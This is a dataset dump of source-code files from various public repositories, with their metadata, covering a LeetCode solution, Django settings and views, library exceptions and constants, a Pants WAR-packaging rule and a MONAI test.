blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8ab39253c3c68371ad76627741d0833f97e1c4b5 | 3929d114c1bc6aef86402300a8d5b278849d41ae | /701. Insert into a Binary Search Tree.py | 5abb58bce2b3ff9cf773ac80caf45a589b4e5a5e | [] | no_license | lxyshuai/leetcode | ee622235266017cf18da9b484f87c1cf9ceb91d0 | 5f98270fbcd2d28d0f2abd344c3348255a12882a | refs/heads/master | 2020-04-05T21:29:37.140525 | 2018-12-16T13:17:15 | 2018-12-16T13:17:15 | 157,222,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,551 | py | """
Given the root node of a binary search tree (BST) and a value to be inserted into the tree, insert the value into the BST. Return the root node of the BST after the insertion. It is guaranteed that the new value does not exist in the original BST.
Note that there may exist multiple valid ways for the insertion, as long as the tree remains a BST after insertion. You can return any of them.
For example,
Given the tree:
4
/ \
2 7
/ \
1 3
And the value to insert: 5
You can return this binary search tree:
4
/ \
2 7
/ \ /
1 3 5
This tree is also valid:
5
/ \
2 7
/ \
1 3
\
4
"""
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def insertIntoBST(self, root, val):
"""
:type root: TreeNode
:type val: int
:rtype: TreeNode
"""
def process(root, val):
if root.val > val:
if root.left:
process(root.left, val)
else:
root.left = TreeNode(val)
elif root.val < val:
if root.right:
process(root.right, val)
else:
root.right = TreeNode(val)
return root
if root is None:
return TreeNode(val)
return process(root, val)
| [
"442536013@qq.com"
] | 442536013@qq.com |
dc309c761d457be4dcea5b7d6967cc27013e4e07 | 209a7a4023a9a79693ec1f6e8045646496d1ea71 | /COMP0016_2020_21_Team12-datasetsExperimentsAna/pwa/FADapp/pythonScripts/venv/Lib/site-packages/aniso8601/exceptions.py | 887cfbd010261406a1330c553a6636ff210ef2f6 | [
"MIT"
] | permissive | anzhao920/MicrosoftProject15_Invictus | 5e2347015411bbffbdf0ceb059df854661fb240c | 15f44eebb09561acbbe7b6730dfadf141e4c166d | refs/heads/main | 2023-04-16T13:24:39.332492 | 2021-04-27T00:47:13 | 2021-04-27T00:47:13 | 361,913,170 | 0 | 0 | MIT | 2021-04-26T22:41:56 | 2021-04-26T22:41:55 | null | UTF-8 | Python | false | false | 1,182 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2021, Brandon Nielsen
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
class ISOFormatError(ValueError):
"""Raised when ISO 8601 string fails a format check."""
class NegativeDurationError(ValueError):
"""Raised when a duration is negative."""
class YearOutOfBoundsError(ValueError):
"""Raised when year exceeds limits."""
class WeekOutOfBoundsError(ValueError):
"""Raised when week exceeds a year."""
class DayOutOfBoundsError(ValueError):
"""Raised when day is outside of 1..365, 1..366 for leap year."""
class HoursOutOfBoundsError(ValueError):
"""Raise when parsed hours are greater than 24."""
class MinutesOutOfBoundsError(ValueError):
"""Raise when parsed seconds are greater than 60."""
class SecondsOutOfBoundsError(ValueError):
"""Raise when parsed seconds are greater than 60."""
class MidnightBoundsError(ValueError):
"""Raise when parsed time has an hour of 24 but is not midnight."""
class LeapSecondError(NotImplementedError):
"""Raised when attempting to parse a leap second"""
| [
"ana.kapros@yahoo.ro"
] | ana.kapros@yahoo.ro |
c2e612ddf1c155b9790bbcbab3b932deecd1ebe2 | dddbf58aa36d9779f1e50e2d761e93fb7580b835 | /settings.py | 9d107f569ede8b4149aab50b91ae1c74772489af | [] | no_license | powellc/lobby_slideshow | 7566933707554b1f4188bd116fcdf51668442d0d | b1fc222c14dd4a9bda5665a7ade6dbe1a20b7d1d | refs/heads/master | 2021-01-02T22:19:23.065149 | 2014-03-07T19:51:33 | 2014-03-07T19:51:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,516 | py | # Django settings for lobby_adamsschool_com project.
import os
import sys
gettext = lambda s: s
PROJECT_PATH = os.path.abspath(os.path.dirname(__file__))
PUBLIC_DIR = os.path.join(PROJECT_PATH, 'public')
LOBBY_HOME = os.path.join(PUBLIC_DIR, 'lobby')
sys.path.insert(0, os.path.join(PROJECT_PATH, "apps"))
ADMINS = (
('Colin Powell', 'colin.powell@gmail.com'),
)
MANAGERS = ADMINS
TIME_ZONE = 'America/New_York'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
gettext_noop = lambda s: s
LANGUAGES = [
('en', gettext_noop('English')),
]
MEDIA_ROOT = os.path.join(LOBBY_HOME, 'media')
STATIC_ROOT = os.path.join(PUBLIC_DIR, 'static')
MEDIA_URL = "/media/"
STATIC_URL = '/static/'
ADMIN_MEDIA_PREFIX = os.path.join(PUBLIC_DIR, "static/admin")
THUMBNAIL_BASEDIR = 'cache'
from imp import find_module
STATICFILES_DIRS = (
os.path.join(os.path.abspath(find_module("debug_toolbar")[1]), 'media'),
os.path.join(os.path.abspath(find_module("superslides")[1]), 'media'),
os.path.join(PROJECT_PATH, 'static'),
)
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'lobby_slideshow.wsgi.application'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
DEBUG_TOOLBAR_MEDIA_ROOT = os.path.join(STATIC_ROOT, 'debug_toolbar')
# Make this unique, and don't share it with anybody.
SECRET_KEY = '=uwxb__g7_w1f7kqznn4fddmgo-y(6)x@fn2lxq(lptb0pqj09'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
os.path.join(PROJECT_PATH, "templates")
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.admindocs',
'south',
'django_extensions',
'debug_toolbar',
'superslides',
'easy_thumbnails',
)
SUPERSLIDES_ROOT = 'slides'
SUPERSLIDES_SLIDE_SIZE = '1300x800'
THUMBNAIL_ALIASES = {
'': {
'slideshow': {'size': (1300, 800), 'crop': False},
},
}
TINYMCE_DEFAULT_CONFIG = {
'plugins': "table,spellchecker,paste,searchreplace",
'theme': "advanced",
}
TINYMCE_SPELLCHECKER = True
TINYMCE_COMPRESSOR = True
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
from local_settings import *
| [
"colin.powell@gmail.com"
] | colin.powell@gmail.com |
efacaba6ff291bba29e7c9f3869a4f4493c615f2 | 65b265426676b9e5ea72e6787ad82fab3446920a | /main.py | 28c53eef4aa2d4e2ec7677b58da224206510035d | [] | no_license | podder-ai/podder-task-sample-tessaract | 47c3687a1d9483f29d9f1b913ddddb2ccfcc2606 | ef8dfa723e0d3dba81363982ab9152c5bfea46e0 | refs/heads/master | 2022-12-02T13:24:05.814188 | 2019-11-17T04:46:33 | 2019-11-17T04:46:33 | 222,094,410 | 0 | 0 | null | 2022-11-22T04:50:00 | 2019-11-16T12:14:30 | Python | UTF-8 | Python | false | false | 259 | py | import uuid
from app.task import Task
from podder_task_foundation import MODE
DAG_ID = "___dag_id___"
def main() -> None:
task = Task(MODE.CONSOLE)
job_id = str(uuid.uuid1())
task.handle(job_id, DAG_ID)
if __name__ == "__main__":
main()
| [
"takaaki.mizuno@gmail.com"
] | takaaki.mizuno@gmail.com |
ed6d9c2ba7ef83ea5ce9da0efe39162f598deded | 1548ce77537dcd50ab04b0eaee050b5d30553e23 | /autotabular/constants.py | c0ad9e5d846e8aca277e0a36426e69307ed79833 | [
"Apache-2.0"
] | permissive | Shamoo100/AutoTabular | 4a20e349104246bf825ebceae33dca0a79928f2e | 7d71bf01d2b7d84fcf5f65c9f45c5cea1255d8a2 | refs/heads/main | 2023-08-13T21:34:34.329888 | 2021-10-02T07:06:00 | 2021-10-02T07:06:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 920 | py | BINARY_CLASSIFICATION = 1
MULTICLASS_CLASSIFICATION = 2
MULTILABEL_CLASSIFICATION = 3
REGRESSION = 4
MULTIOUTPUT_REGRESSION = 5
REGRESSION_TASKS = [REGRESSION, MULTIOUTPUT_REGRESSION]
CLASSIFICATION_TASKS = [
BINARY_CLASSIFICATION, MULTICLASS_CLASSIFICATION, MULTILABEL_CLASSIFICATION
]
TASK_TYPES = REGRESSION_TASKS + CLASSIFICATION_TASKS
TASK_TYPES_TO_STRING = \
{BINARY_CLASSIFICATION: 'binary.classification',
MULTICLASS_CLASSIFICATION: 'multiclass.classification',
MULTILABEL_CLASSIFICATION: 'multilabel.classification',
REGRESSION: 'regression',
MULTIOUTPUT_REGRESSION: 'multioutput.regression'}
STRING_TO_TASK_TYPES = \
{'binary.classification': BINARY_CLASSIFICATION,
'multiclass.classification': MULTICLASS_CLASSIFICATION,
'multilabel.classification': MULTILABEL_CLASSIFICATION,
'regression': REGRESSION,
'multioutput.regression': MULTIOUTPUT_REGRESSION}
| [
"jianzhnie@126.com"
] | jianzhnie@126.com |
438d6c4940c8513fdd919f483d63f2bfc6b96bc8 | b767d5e8c5a32d360196ff3b89efc42dce0071b3 | /blog/acl/views.py | deae34df69b4570befe5e51dbec27d7a352187c5 | [] | no_license | wangjiancn/back-end_blog | 749d40a1c447975408a5538c33ac334d826d5d2c | da79506169573df7d48784f5f109be61e59edc7b | refs/heads/master | 2022-12-11T06:34:17.641252 | 2020-04-13T13:13:35 | 2020-04-13T14:24:26 | 186,651,614 | 1 | 0 | null | 2022-05-25T02:48:28 | 2019-05-14T15:35:24 | Python | UTF-8 | Python | false | false | 813 | py | import json
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth import authenticate
from .models import UserProfile
from .auth_wrap import token_required
from utils.api_response import APIResponse, APIResponseError
@require_POST
@csrf_exempt
def register(r):
"""注册"""
data = json.loads(r.body)
user = UserProfile.objects.create_user(**data)
return APIResponse(user.token)
@csrf_exempt
@require_POST
def login(r):
"""登录"""
data = json.loads(r.body)
user = authenticate(**data)
if user is not None:
return APIResponse(user.token)
else:
return APIResponseError(10005)
@token_required
@require_POST
@csrf_exempt
def logout(r):
"""注销"""
return APIResponse()
| [
"wangjianchn@outlook.com"
] | wangjianchn@outlook.com |
68fff833f3fd4310916ca1b8d9065f46d4002a05 | 9cc1b58d0319308da98187d071295b2fabf1f080 | /TQC_考題練習/b0526_TQC證照_301.py | 37df2111df4e754b9ad91e97a2c89db29fd43817 | [
"MIT"
] | permissive | Arwen0905/Python_Test | 60d1dee383c9cf27df6b93cfde7884c91092229c | c75357e4354a684a9fae41f751dae60d4cf0716c | refs/heads/master | 2023-01-13T13:14:55.355898 | 2020-10-31T18:52:07 | 2020-10-31T18:52:07 | 265,150,874 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | # 1. 題目說明:
# 請開啟PYD301.py檔案,依下列題意進行作答,
# 依輸入值計算總和,使輸出值符合題意要求。
# 作答完成請另存新檔為PYA301.py再進行評分。
# 2. 設計說明:
# 請使用迴圈敘述撰寫一程式,
# 讓使用者輸入兩個正整數a、b(a < b),
# 利用迴圈計算從a開始連加到b的總和。
# 例如:輸入a=1、b=100,
# 則輸出結果為5050(1 + 2 + … + 100 = 5050)。
# 3. 輸入輸出:
# 輸入說明
# 兩個正整數(a、b,且a < b)
# 輸出說明
# 計算從a開始連加到b的總和
# 輸入輸出範例
# 範例輸入
# 66
# 666
# 範例輸出
# 219966
# TODO
a = int(input())
b = int(input())
# a,b = 66,666
ans = 0
if a<b:
for i in range(a, b+1):
ans+=i
print(ans)
| [
"qq23378452@gmail.com"
] | qq23378452@gmail.com |
831feaf2beaa8177145bc39ad2ed5b7309728577 | e61e8f906b7f1de60fca47ac01293ef695d22a9b | /home/migrations/0003_auto_20181127_2103.py | c688484ad34957611673fae6c50c61d7c7a3a693 | [] | no_license | redcliver/marioseguros | e5f775d129a201e80a55f7ac266952e41ecb9079 | da0aeb3b2625dd0ce35e074d94231066a9483501 | refs/heads/master | 2020-03-30T02:40:21.419727 | 2019-02-04T14:19:36 | 2019-02-04T14:19:36 | 150,642,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,504 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-11-27 21:03
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('home', '0002_auto_20181127_0958'),
]
operations = [
migrations.AddField(
model_name='cliente',
name='inscricao',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='bairro',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='cliente',
name='cep',
field=models.CharField(blank=True, max_length=10, null=True),
),
migrations.AlterField(
model_name='cliente',
name='cidade',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AlterField(
model_name='cliente',
name='cpf',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='data_nasc',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, null=True),
),
migrations.AlterField(
model_name='cliente',
name='endereco',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AlterField(
model_name='cliente',
name='estado',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='cliente',
name='numero',
field=models.CharField(blank=True, max_length=6, null=True),
),
migrations.AlterField(
model_name='cliente',
name='rg',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='rg_uf',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='venc_habilitacao',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, null=True),
),
]
| [
"igor-peres@hotmail.com"
] | igor-peres@hotmail.com |
5e0ef252f9b0c83b10c62836004ad7774ad55827 | 377420d718094a37da2e170718cecd80435d425a | /google/ads/googleads/v4/services/types/user_interest_service.py | e0da2b7489e7318a888329e4829469e8b0cd7f31 | [
"Apache-2.0"
] | permissive | sammillendo/google-ads-python | ed34e737748e91a0fc5716d21f8dec0a4ae088c1 | a39748521847e85138fca593f3be2681352ad024 | refs/heads/master | 2023-04-13T18:44:09.839378 | 2021-04-22T14:33:09 | 2021-04-22T14:33:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v4.services",
marshal="google.ads.googleads.v4",
manifest={"GetUserInterestRequest",},
)
class GetUserInterestRequest(proto.Message):
r"""Request message for
[UserInterestService.GetUserInterest][google.ads.googleads.v4.services.UserInterestService.GetUserInterest].
Attributes:
resource_name (str):
Required. Resource name of the UserInterest
to fetch.
"""
resource_name = proto.Field(proto.STRING, number=1)
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"noreply@github.com"
] | sammillendo.noreply@github.com |
429b151fd242a071d82942054526cb5f29dacb65 | e7a48c161eabd4b941f4cc29a8064c5ba2ec1aa3 | /project/apps/tables/views.py | 7c1987ac8cb055cb7b9fd7144915232a31822d6e | [] | no_license | MauricioDinki/mesa-regalos | 7d3d7968990323a828dd58107045d12db1f005a3 | 66dbb879421a2f563b731154462e526036f9d957 | refs/heads/master | 2022-12-12T06:04:36.508639 | 2019-05-30T07:23:21 | 2019-05-30T07:23:21 | 189,360,356 | 0 | 0 | null | 2022-12-08T05:11:50 | 2019-05-30T06:41:55 | Python | UTF-8 | Python | false | false | 3,218 | py | from django.contrib import messages
from django.http import Http404
from django.shortcuts import redirect
from django.template.response import TemplateResponse
from django.urls import reverse, reverse_lazy
from django.views import View
from django.views.generic import FormView, DeleteView, UpdateView, TemplateView
from project.apps.gifts.models import Gift
from project.apps.tables.forms import EventForm, BuyGiftForm
from project.apps.tables.models import Table, TableGift
from project.core.mixins import RequestFormMixin
class EventView(RequestFormMixin, FormView):
template_name = 'events/create.html'
form_class = EventForm
success_url = reverse_lazy('gifts:gifts')
def form_valid(self, form):
form.save()
return super(EventView, self).form_valid(form)
class TableDeleteView(DeleteView):
model = Table
template_name = 'tables/delete.html'
success_url = reverse_lazy('users:profile')
def get_object(self, queryset=None):
""" Hook to ensure object is owned by request.user. """
obj = super(TableDeleteView, self).get_object()
if not obj.user == self.request.user:
raise Http404
return obj
class TableUpdate(RequestFormMixin, UpdateView):
template_name = 'tables/update.html'
form_class = EventForm
success_url = reverse_lazy('users:profile')
pk_url_kwarg = 'pk'
def get_object(self, queryset=None):
pk = self.kwargs.get('pk')
obj = Table.objects.get(pk=pk)
if not obj.user == self.request.user:
raise Http404
return obj
class TableDetailView(TemplateView):
template_name = 'tables/detail.html'
def get_context_data(self, **kwargs):
context = super(TableDetailView, self).get_context_data(**kwargs)
pk = kwargs.get('pk')
obj = Table.objects.get(pk=pk)
if not obj.user == self.request.user:
raise Http404
gifts = TableGift.objects.filter(table=obj)
context['table'] = obj
context['gifts'] = gifts
return context
class SelectGiftView(View):
def get_context_data(self, **kwargs):
pk = kwargs.get('pk')
table = Table.objects.get(pk=pk)
gifts = TableGift.objects.filter(table=table)
context = {
'table': table,
'gifts': gifts
}
return context
def get(self, request, **kwargs):
context = self.get_context_data(**kwargs)
return TemplateResponse(request, 'tables/select.html', context)
class BuyGiftView(View):
def get_context_data(self, **kwargs):
table = Table.objects.get(pk=kwargs.get('pk'))
gift = Gift.objects.get(pk=kwargs.get('id'))
form = BuyGiftForm()
context = {
'table': table,
'gift': gift,
'form': form,
}
return context
def get(self, request, **kwargs):
context = self.get_context_data(**kwargs)
return TemplateResponse(request, 'tables/buy.html', context)
def post(self, request, **kwargs):
context = self.get_context_data(**kwargs)
buy_gift_form = BuyGiftForm(
request.POST,
request=request,
table=context['table'],
gift=context['gift'],
)
if buy_gift_form.is_valid():
buy_gift_form.save()
messages.info(request, "Felicidades, la compra fue completada con exito")
return redirect(reverse_lazy('tables:select_gift', kwargs={'pk': kwargs.get('pk')}))
context['form'] = buy_gift_form
return TemplateResponse(request, 'tables/buy.html', context) | [
"mauriciodinki@gmail.com"
] | mauriciodinki@gmail.com |
5f1ebaaf134e28a2cce175fab00ab1e2933603c3 | 5db0fab37c2b8a618d85d3b60fab9f806c416474 | /src/python/pants/jvm/package/war.py | 31c96a849f1c243e7a90c996c3d22ed4cd110ea1 | [
"Apache-2.0"
] | permissive | pantsbuild/pants | 4988d1ac5474ec95f94ce2218aeb759401e4b011 | 98cbda8545f0d58c586ed2daa76fefd729d5e0d5 | refs/heads/main | 2023-09-05T03:44:17.646899 | 2023-09-01T19:52:09 | 2023-09-01T19:52:09 | 7,209,075 | 2,708 | 593 | Apache-2.0 | 2023-09-14T19:33:33 | 2012-12-17T17:39:04 | Python | UTF-8 | Python | false | false | 7,675 | py | # Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import logging
import textwrap
from dataclasses import dataclass
from pathlib import PurePath
from typing import Iterable
from pants.build_graph.address import Address
from pants.core.goals.package import (
BuiltPackage,
BuiltPackageArtifact,
OutputPathField,
PackageFieldSet,
)
from pants.core.target_types import FileSourceField, ResourceSourceField
from pants.core.util_rules.source_files import SourceFiles, SourceFilesRequest
from pants.core.util_rules.system_binaries import BashBinary, ZipBinary
from pants.engine.addresses import Addresses, UnparsedAddressInputs
from pants.engine.fs import (
EMPTY_DIGEST,
AddPrefix,
CreateDigest,
Digest,
DigestEntries,
DigestSubset,
Directory,
FileContent,
FileEntry,
MergeDigests,
PathGlobs,
)
from pants.engine.internals.selectors import MultiGet
from pants.engine.process import Process, ProcessResult
from pants.engine.rules import Get, collect_rules, rule
from pants.engine.target import (
DependenciesRequest,
HydratedSources,
HydrateSourcesRequest,
SourcesField,
Targets,
)
from pants.engine.unions import UnionRule
from pants.jvm.classpath import Classpath
from pants.jvm.shading.rules import ShadedJar, ShadeJarRequest
from pants.jvm.target_types import (
JvmShadingRule,
JvmWarContentField,
JvmWarDependenciesField,
JvmWarDescriptorAddressField,
JvmWarShadingRulesField,
)
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class PackageWarFileFieldSet(PackageFieldSet):
required_fields = (
JvmWarDependenciesField,
JvmWarDescriptorAddressField,
)
output_path: OutputPathField
dependencies: JvmWarDependenciesField
descriptor: JvmWarDescriptorAddressField
content: JvmWarContentField
shading_rules: JvmWarShadingRulesField
@dataclass(frozen=True)
class RenderWarDeploymentDescriptorRequest:
descriptor: JvmWarDescriptorAddressField
owning_address: Address
@dataclass(frozen=True)
class RenderedWarDeploymentDescriptor:
digest: Digest
@dataclass(frozen=True)
class RenderWarContentRequest:
content: JvmWarContentField
@dataclass(frozen=True)
class RenderedWarContent:
digest: Digest
async def _apply_shading_rules_to_classpath(
classpath: Classpath, shading_rules: Iterable[JvmShadingRule] | None
) -> Digest:
input_digest = await Get(Digest, MergeDigests(classpath.digests()))
if not shading_rules:
return input_digest
jars_digest = await Get(Digest, DigestSubset(input_digest, PathGlobs(["**/*.jar"])))
digest_entries = await Get(DigestEntries, Digest, jars_digest)
jar_entries = [entry for entry in digest_entries if isinstance(entry, FileEntry)]
if len(jar_entries) == 0:
return EMPTY_DIGEST
jar_digests = await MultiGet(Get(Digest, CreateDigest([entry])) for entry in jar_entries)
shaded_jars = await MultiGet(
Get(ShadedJar, ShadeJarRequest(path=entry.path, digest=digest, rules=shading_rules))
for entry, digest in zip(jar_entries, jar_digests)
)
return await Get(Digest, MergeDigests([shaded.digest for shaded in shaded_jars]))
@rule
async def package_war(
field_set: PackageWarFileFieldSet,
bash: BashBinary,
zip: ZipBinary,
) -> BuiltPackage:
classpath = await Get(Classpath, DependenciesRequest(field_set.dependencies))
all_jar_files_digest = await _apply_shading_rules_to_classpath(
classpath, field_set.shading_rules.value
)
prefixed_jars_digest, content, descriptor, input_setup_digest = await MultiGet(
Get(Digest, AddPrefix(all_jar_files_digest, "__war__/WEB-INF/lib")),
Get(RenderedWarContent, RenderWarContentRequest(field_set.content)),
Get(
RenderedWarDeploymentDescriptor,
RenderWarDeploymentDescriptorRequest(field_set.descriptor, field_set.address),
),
Get(
Digest,
CreateDigest(
[
FileContent(
"make_war.sh",
textwrap.dedent(
f"""\
cd __war__
{zip.path} ../output.war -r .
"""
).encode(),
is_executable=True,
),
Directory("__war__/WEB-INF/classes"),
Directory("__war__/WEB-INF/lib"),
]
),
),
)
input_digest = await Get(
Digest,
MergeDigests(
[
prefixed_jars_digest,
descriptor.digest,
content.digest,
input_setup_digest,
]
),
)
result = await Get(
ProcessResult,
Process(
[bash.path, "make_war.sh"],
input_digest=input_digest,
output_files=("output.war",),
description=f"Assemble WAR file for {field_set.address}",
),
)
output_entries = await Get(DigestEntries, Digest, result.output_digest)
if len(output_entries) != 1:
raise AssertionError("No output from war assembly step.")
output_entry = output_entries[0]
if not isinstance(output_entry, FileEntry):
raise AssertionError("Unexpected digest entry")
output_filename = PurePath(field_set.output_path.value_or_default(file_ending="war"))
package_digest = await Get(
Digest, CreateDigest([FileEntry(str(output_filename), output_entry.file_digest)])
)
artifact = BuiltPackageArtifact(relpath=str(output_filename))
return BuiltPackage(digest=package_digest, artifacts=(artifact,))
@rule
async def render_war_deployment_descriptor(
request: RenderWarDeploymentDescriptorRequest,
) -> RenderedWarDeploymentDescriptor:
descriptor_sources = await Get(
HydratedSources,
HydrateSourcesRequest(request.descriptor),
)
descriptor_sources_entries = await Get(
DigestEntries, Digest, descriptor_sources.snapshot.digest
)
if len(descriptor_sources_entries) != 1:
raise AssertionError(
f"Expected `descriptor` field for {request.descriptor.address} to only refer to one file."
)
descriptor_entry = descriptor_sources_entries[0]
if not isinstance(descriptor_entry, FileEntry):
raise AssertionError(
f"Expected `descriptor` field for {request.descriptor.address} to produce a file."
)
descriptor_digest = await Get(
Digest,
CreateDigest([FileEntry("__war__/WEB-INF/web.xml", descriptor_entry.file_digest)]),
)
return RenderedWarDeploymentDescriptor(descriptor_digest)
@rule
async def render_war_content(request: RenderWarContentRequest) -> RenderedWarContent:
addresses = await Get(
Addresses, UnparsedAddressInputs, request.content.to_unparsed_address_inputs()
)
targets = await Get(Targets, Addresses, addresses)
sources = await Get(
SourceFiles,
SourceFilesRequest(
[tgt[SourcesField] for tgt in targets if tgt.has_field(SourcesField)],
for_sources_types=(ResourceSourceField, FileSourceField),
enable_codegen=True,
),
)
digest = await Get(Digest, AddPrefix(sources.snapshot.digest, "__war__"))
return RenderedWarContent(digest)
def rules():
return (
*collect_rules(),
UnionRule(PackageFieldSet, PackageWarFileFieldSet),
)
| [
"noreply@github.com"
] | pantsbuild.noreply@github.com |
fe2f7f2530cf752e62798071f21f4b0661893d06 | 15a992391375efd487b6442daf4e9dd963167379 | /tests/test_simulatedelay.py | 3a0507dae745ed25ed225fcb317707121dba18bb | [
"Apache-2.0"
] | permissive | Bala93/MONAI | b0e68e1b513adcd20eab5158d4a0e5c56347a2cd | e0a7eff5066da307a73df9145077f6f1fec7a514 | refs/heads/master | 2022-08-22T18:01:25.892982 | 2022-08-12T18:13:53 | 2022-08-12T18:13:53 | 259,398,958 | 2 | 0 | null | 2020-04-27T17:09:12 | 2020-04-27T17:09:11 | null | UTF-8 | Python | false | false | 1,251 | py | # Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import unittest
import numpy as np
from parameterized import parameterized
from monai.transforms.utility.array import SimulateDelay
from tests.utils import NumpyImageTestCase2D
class TestSimulateDelay(NumpyImageTestCase2D):
@parameterized.expand([(0.45,), (1,)])
def test_value(self, delay_test_time: float):
resize = SimulateDelay(delay_time=delay_test_time)
start: float = time.time()
_ = resize(self.imt[0])
stop: float = time.time()
measured_approximate: float = stop - start
np.testing.assert_allclose(delay_test_time, measured_approximate, rtol=0.5)
if __name__ == "__main__":
unittest.main()
| [
"noreply@github.com"
] | Bala93.noreply@github.com |
03d4ba232b4d34b7e9a72471e1ff44e5c604831f | ce76b3ef70b885d7c354b6ddb8447d111548e0f1 | /man_and_new_group/different_group_or_little_hand.py | 152d6b704e1cb5dd4be2d6ff23ee40a673ea85fe | [] | no_license | JingkaiTang/github-play | 9bdca4115eee94a7b5e4ae9d3d6052514729ff21 | 51b550425a91a97480714fe9bc63cb5112f6f729 | refs/heads/master | 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 207 | py |
#! /usr/bin/env python
def company(str_arg):
day_and_small_way(str_arg)
print('get_new_fact')
def day_and_small_way(str_arg):
print(str_arg)
if __name__ == '__main__':
company('company')
| [
"jingkaitang@gmail.com"
] | jingkaitang@gmail.com |
